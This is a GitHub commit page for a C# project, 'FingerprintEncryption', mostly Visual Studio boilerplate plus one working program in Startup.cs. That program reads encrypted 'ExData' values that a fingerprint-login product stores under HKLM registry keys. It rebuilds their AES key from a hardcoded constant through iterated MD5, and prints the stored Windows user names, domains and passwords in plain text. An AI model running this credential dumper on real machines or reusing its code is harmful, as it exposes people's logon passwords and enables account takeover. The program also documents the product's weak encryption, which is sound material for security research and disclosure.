Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Browse files

Initial commit

  • Loading branch information...
commit a5bcbad36bb71915ff4b39fd7ba54e4b88c6a1ff 1 parent f6ac984
@brandonlw authored
View
62 FingerprintEncryption/FingerprintEncryption.csproj
@@ -0,0 +1,62 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <PropertyGroup>
+ <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+ <Platform Condition=" '$(Platform)' == '' ">x86</Platform>
+ <ProductVersion>8.0.30703</ProductVersion>
+ <SchemaVersion>2.0</SchemaVersion>
+ <ProjectGuid>{BEAC59D0-FC29-46E8-B925-45EE37729C6B}</ProjectGuid>
+ <OutputType>Exe</OutputType>
+ <AppDesignerFolder>Properties</AppDesignerFolder>
+ <RootNamespace>ConsoleApplication1</RootNamespace>
+ <AssemblyName>FingerprintEncryption</AssemblyName>
+ <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
+ <TargetFrameworkProfile>
+ </TargetFrameworkProfile>
+ <FileAlignment>512</FileAlignment>
+ </PropertyGroup>
+ <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' ">
+ <PlatformTarget>x86</PlatformTarget>
+ <DebugSymbols>true</DebugSymbols>
+ <DebugType>full</DebugType>
+ <Optimize>false</Optimize>
+ <OutputPath>bin\Debug\</OutputPath>
+ <DefineConstants>DEBUG;TRACE</DefineConstants>
+ <ErrorReport>prompt</ErrorReport>
+ <WarningLevel>4</WarningLevel>
+ </PropertyGroup>
+ <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
+ <PlatformTarget>x86</PlatformTarget>
+ <DebugType>pdbonly</DebugType>
+ <Optimize>true</Optimize>
+ <OutputPath>bin\Release\</OutputPath>
+ <DefineConstants>TRACE</DefineConstants>
+ <ErrorReport>prompt</ErrorReport>
+ <WarningLevel>4</WarningLevel>
+ </PropertyGroup>
+ <ItemGroup>
+ <Reference Include="System" />
+ <Reference Include="System.Core" />
+ <Reference Include="System.Windows.Forms" />
+ <Reference Include="System.Xml.Linq" />
+ <Reference Include="System.Data.DataSetExtensions" />
+ <Reference Include="Microsoft.CSharp" />
+ <Reference Include="System.Data" />
+ <Reference Include="System.Xml" />
+ </ItemGroup>
+ <ItemGroup>
+ <Compile Include="Startup.cs" />
+ <Compile Include="Properties\AssemblyInfo.cs" />
+ </ItemGroup>
+ <ItemGroup>
+ <None Include="app.config" />
+ </ItemGroup>
+ <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+ <!-- To modify your build process, add your task inside one of the targets below and uncomment it.
+ Other similar extension points exist, see Microsoft.Common.targets.
+ <Target Name="BeforeBuild">
+ </Target>
+ <Target Name="AfterBuild">
+ </Target>
+ -->
+</Project>
View
7 FingerprintEncryption/FingerprintEncryption.csproj.user
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
+ <StartArguments>
+ </StartArguments>
+ </PropertyGroup>
+</Project>
View
20 FingerprintEncryption/FingerprintEncryption.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual C# Express 2010
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FingerprintEncryption", "FingerprintEncryption.csproj", "{BEAC59D0-FC29-46E8-B925-45EE37729C6B}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x86 = Debug|x86
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {BEAC59D0-FC29-46E8-B925-45EE37729C6B}.Debug|x86.ActiveCfg = Debug|x86
+ {BEAC59D0-FC29-46E8-B925-45EE37729C6B}.Debug|x86.Build.0 = Debug|x86
+ {BEAC59D0-FC29-46E8-B925-45EE37729C6B}.Release|x86.ActiveCfg = Release|x86
+ {BEAC59D0-FC29-46E8-B925-45EE37729C6B}.Release|x86.Build.0 = Release|x86
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
View
BIN  FingerprintEncryption/FingerprintEncryption.suo
Binary file not shown
View
36 FingerprintEncryption/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("ConsoleApplication1")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("Microsoft")]
+[assembly: AssemblyProduct("ConsoleApplication1")]
+[assembly: AssemblyCopyright("Copyright © Microsoft 2012")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("4a4812ba-d787-492e-a229-a08c476d1953")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
View
254 FingerprintEncryption/Startup.cs
@@ -0,0 +1,254 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Security.Cryptography;
+using System.Text;
+
+namespace FingerprintEncryption
+{
+ class Startup
+ {
+ private static bool _verbose = false;
+
+ //NOTE: This only seems to decrypt "ExData", not the other one, which is okay I guess since it has more data.
+ // It's structured in such a way that hopefully it'll work for other key lengths besides just 56.
+ // It currently tries to decrypt any "ExData" values in either 32-bit or 64-bit registries and displays the Unicode strings within.
+ // I haven't figured out the format of the data yet -- not easy to traverse at first glance.
+ //Forgive the awfulness that is this code file.
+ static void Main(string[] args)
+ {
+ //Display basic stuff
+ var asm = System.Reflection.Assembly.GetExecutingAssembly().GetName();
+ Console.WriteLine(asm.Name + " v" + asm.Version.ToString(3));
+ Console.WriteLine("This application attempts to extract your logon information");
+ Console.WriteLine(" from one or more encrypted registry keys.");
+
+ //Parse command line arguments
+ foreach (var arg in args)
+ {
+ var a = arg.TrimEnd(new char[] { '-', '/' });
+ if (a.Contains("v"))
+ _verbose = true;
+ else if (a.Contains("h"))
+ {
+ //Display help
+ Console.WriteLine("Options:");
+ Console.WriteLine("-v\tVerbose mode; display all strings from registry key.");
+ Console.WriteLine("-h\tDisplay this help text.");
+ Console.WriteLine();
+
+ return;
+ }
+ }
+
+ //Get busy...
+ Console.WriteLine();
+ Console.WriteLine("Working...");
+
+ //Check all the registry keys we know of...
+ _ScanRegistryKey(@"Software\Virtual Token\Passport\2.0\Passport");
+ _ScanRegistryKey(@"Software\Virtual Token\Passport\2.0\LocalPassport");
+ _ScanRegistryKey(@"Software\Virtual Token\Passport\2.0\DevicePassport");
+ _ScanRegistryKey(@"Software\Virtual Token\Passport\2.0\VoidPassport");
+ _ScanRegistryKey(@"Software\Virtual Token\Passport\4.0\Passport");
+ _ScanRegistryKey(@"Software\Virtual Token\Passport\4.0\LocalPassport");
+ _ScanRegistryKey(@"Software\Virtual Token\Passport\4.0\DevicePassport");
+ _ScanRegistryKey(@"Software\Virtual Token\Passport\4.0\VoidPassport");
+ }
+
+ private static void _ScanRegistryKey(string subKey)
+ {
+ //Deal with 32-bit version
+ var reg32 = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry32);
+ var key32 = reg32.OpenSubKey(subKey);
+ if (key32 != null)
+ {
+ //Fetch all the 32-bit keys
+ foreach (var name in key32.GetSubKeyNames())
+ {
+ var r = key32.OpenSubKey(name);
+ foreach (var val in r.GetValueNames())
+ {
+ //Handle this key value
+ _HandleKeyValue(r.Name, val, (byte[])r.GetValue(val));
+ }
+ }
+ }
+
+ //Deal with 64-bit version
+ var reg64 = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
+ var key64 = reg64.OpenSubKey(subKey);
+ if (key64 != null)
+ {
+ //Fetch all the 64-bit keys
+ foreach (var name in key64.GetSubKeyNames())
+ {
+ var r = key64.OpenSubKey(name);
+ foreach (var val in r.GetValueNames())
+ {
+ //Handle this key value
+ _HandleKeyValue(r.Name, val, (byte[])r.GetValue(val));
+ }
+ }
+ }
+ }
+
+ private static void _HandleKeyValue(string key, string name, byte[] raw)
+ {
+ //HACK: Since this currently only supports ExData, only look for it...
+ if (name == "ExData")
+ {
+ //Display initial information
+ Console.WriteLine(String.Format("Found {0}, name {1}:", key, name));
+
+ //Extract the relevant pieces of information
+ int header = _GetInt(raw, 0);
+ int type = _GetInt(raw, 4);
+ int bitLength = _GetInt(raw, 16);
+ var data = new byte[_GetInt(raw, 20)];
+ Array.Copy(raw, 24, data, 0, data.Length);
+ var iv = new byte[_GetInt(raw, 24 + data.Length)];
+ Array.Copy(raw, 24 + data.Length + 4, iv, 0, iv.Length);
+ if (_verbose)
+ {
+ Console.WriteLine(String.Format("\tHeader: {0}", header.ToString("X4")));
+ Console.WriteLine(String.Format("\tType: {0}", type.ToString("X4")));
+ Console.WriteLine(String.Format("\tBit length: {0}", bitLength.ToString()));
+ Console.WriteLine(String.Format("\tIV length: {0}", iv.Length.ToString("X4")));
+ Console.WriteLine(String.Format("\tDecrypting {0} data bytes...", data.Length.ToString("X4")));
+ }
+
+ var output = _DecryptData(data, iv, bitLength, null);
+ if (output[8] == 'P' && output[9] == 'S' && output[10] == '1')
+ {
+ if (_verbose) Console.WriteLine("\tDecryption successful!");
+
+ //HACK: Really dumb parsing of the string data since I can't seem to figure it out yet...
+ //Look for B0 04 00 00, and if found, look at the previous int for the size and rip it out
+ int i = 11;
+ if (_verbose) Console.WriteLine("\tStrings:");
+ var lastString = String.Empty;
+ while (i < output.Length)
+ {
+ if (output[i] == 0xB0 && output[i + 1] == 0x04 && output[i + 2] == 0x00 && output[i + 3] == 0x00)
+ {
+ //Get the size
+ int size = _GetInt(output, i - 4);
+
+ //Rip out the data
+ var str = System.Text.UnicodeEncoding.Unicode.GetString(output, i + 4, size).TrimEnd('\0');
+
+ //Display it
+ if (_verbose)
+ {
+ Console.WriteLine("\t\t" + str);
+ }
+ else
+ {
+ switch (lastString.ToLower())
+ {
+ case "0x11":
+ {
+ Console.WriteLine("\t\tUser name:\t" + str);
+ break;
+ }
+ case "0x12":
+ {
+ if (str.ToLower() != "p1" && str.ToLower() != "0x11" && str.ToLower() != "0x12")
+ Console.WriteLine("\t\tDomain:\t" + str);
+ break;
+ }
+ case "p1":
+ {
+ Console.WriteLine("\t\tPassword:\t" + str);
+ break;
+ }
+ default:
+ {
+ //Uh? Oh well...
+ break;
+ }
+ }
+ }
+
+ //Save it for next iteration
+ lastString = str;
+ }
+
+ i++;
+ }
+ }
+ else
+ {
+ if (_verbose) Console.WriteLine("\tDecryption error!");
+ }
+ }
+ }
+
+ private static int _GetInt(byte[] raw, int offset)
+ {
+ return (raw[offset] | (raw[offset + 1] << 8) | (raw[offset + 2] << 16) | (raw[offset + 3] << 24));
+ }
+
+ private static byte[] _DecryptData(byte[] data, byte[] IV, int bitLength, byte[] passphrase)
+ {
+ var aes = new System.Security.Cryptography.AesCryptoServiceProvider();
+ var iv = new byte[16]; //always 16 for AES
+ var key = new byte[IV.Length == 7 ? 32 : IV.Length / 8]; //HACK: for "AES-56", convert to AES-256
+ var ret = new byte[data.Length];
+
+ //Pad the IV if necessary
+ Array.Copy(IV, iv, IV.Length);
+
+ //Derive the key
+ var derived = _DeriveEncryptionKey(bitLength, passphrase);
+ Array.Copy(derived, key, derived.Length);
+
+ //Decrypt it!
+ aes.CreateDecryptor(key, iv).TransformBlock(data, 0, data.Length, ret, 0);
+
+ return ret;
+ }
+
+ private static byte[] _DeriveEncryptionKey(int bitLength, byte[] passphrase)
+ {
+ //Key derivation logic:
+ // Constant array is concatenated with passphrase and MD5 hashed.
+ // For a certain number of iterations:
+ // The passphrase is concatenated with the previous hash, MD5 hashed, and then used as the new hash.
+ // The number of bytes required for the requested key is calculated.
+ // For each byte of the key:
+ // Calculate the MD5 hash of the previous hash.
+ // Use the 12th byte as part of the key.
+ const int ITERATIONS = 1000;
+ byte[] start = { 0xEA, 0x59, 0x40, 0xC3, 0xB9, 0x41, 0x9C, 0xD2, 0xEB, 0x72, 0x96, 0xEF, 0x70, 0xD9, 0xAA, 0x2F };
+ var md5 = new MD5CryptoServiceProvider();
+ byte[] hash = md5.ComputeHash(_Merge(start, passphrase));
+
+ for (int i = 0; i < ITERATIONS; i++)
+ hash = md5.ComputeHash(_Merge(passphrase, hash));
+ var key = new byte[(bitLength + 7) / 8];
+ for (int i = 0; i < key.Length; i++)
+ {
+ hash = md5.ComputeHash(hash);
+ key[i] = hash[11];
+ }
+
+ return key;
+ }
+
+ //Just merges two arrays. You can pass NULL for either (or both?).
+ private static byte[] _Merge(byte[] first, byte[] second)
+ {
+ var ret = new byte[(first != null ? first.Length : 0) + (second != null ? second.Length : 0)];
+
+ if (first != null)
+ Array.Copy(first, ret, first.Length);
+ if (second != null)
+ Array.Copy(second, 0, ret, (first != null ? first.Length : 0), second.Length);
+
+ return ret;
+ }
+ }
+}
View
3  FingerprintEncryption/app.config
@@ -0,0 +1,3 @@
+<?xml version="1.0"?>
+<configuration>
+<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/></startup></configuration>
Please sign in to comment.
Something went wrong with that request. Please try again.